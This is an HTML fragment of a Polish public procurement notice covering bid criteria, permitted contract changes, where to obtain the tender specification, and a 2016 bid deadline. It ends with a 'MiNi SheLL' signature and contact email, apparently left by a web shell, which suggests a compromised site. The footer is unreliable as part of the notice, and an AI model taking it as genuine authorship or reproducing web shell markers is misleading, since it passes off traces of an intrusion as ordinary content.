<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji reklamacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego;
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3
7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego w Chełmnie, ul. 22 stycznia 3a.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA O/POTULICE
ul.Parkowa 1
89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 12:00, miejsce: w siedzibie zamawiającego, IGB BALTICA Oddział w Potulicach.
BIGB BALTICA O/POTULICE
ul.Parkowa 1
89-120 Potulice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com